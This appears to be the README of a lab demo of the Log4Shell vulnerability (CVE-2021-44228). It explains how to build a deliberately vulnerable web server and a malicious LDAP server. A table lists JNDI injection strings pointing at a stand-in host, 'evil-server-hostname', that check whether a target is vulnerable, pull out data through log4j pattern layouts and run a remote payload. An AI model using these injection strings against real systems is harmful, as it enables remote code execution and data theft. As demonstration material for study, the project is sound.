# Odysseus

A demo of the Log4Shell ([CVE-2021-44228]( vulnerability.

## Build Instructions

The vulnerable webserver and malicious LDAP server were both built and tested on JDK 1.8.0_181.

### Good Guys Web Server

1. Inside `goodguys`, run `gradlew bootJar`
2. Run vulnerable webserver using `java -jar build/libs/goodguys-0.0.1-SNAPSHOT.jar`

### Bad Guys LDAP/Web Server

1. Inside `badguys`, run `mvn package`
2. Run evil server using `java -jar .\target\evil-server.jar`

> Note: Windows defender may quietly move `target\classes\Exploit.class` to quarantine.

## Evil Payload

The malicious commands are defined inside [](/badguys/src/main/java/

## Injection Trigger

| Input                                                                    | Remarks                                                                                                   |
| ------------------------------------------------------------------------ | --------------------------------------------------------------------------------------------------------- |
| `${jndi:ldap://evil-server-hostname:389/Recon}`                          | Checks if the target is vulnerable by listening to a connection request to the LDAP server.               |
| `${jndi:ldap://evil-server-hostname:389/Recon [log4j Pattern Layout(s)]` | Append any valid log4j pattern latyouts to collect the data from target and display in attacker terminal. |
| `${jndi:ldap://evil-server-hostname:389/Exploit}`                        | Run the payload.                                                                                          |

## References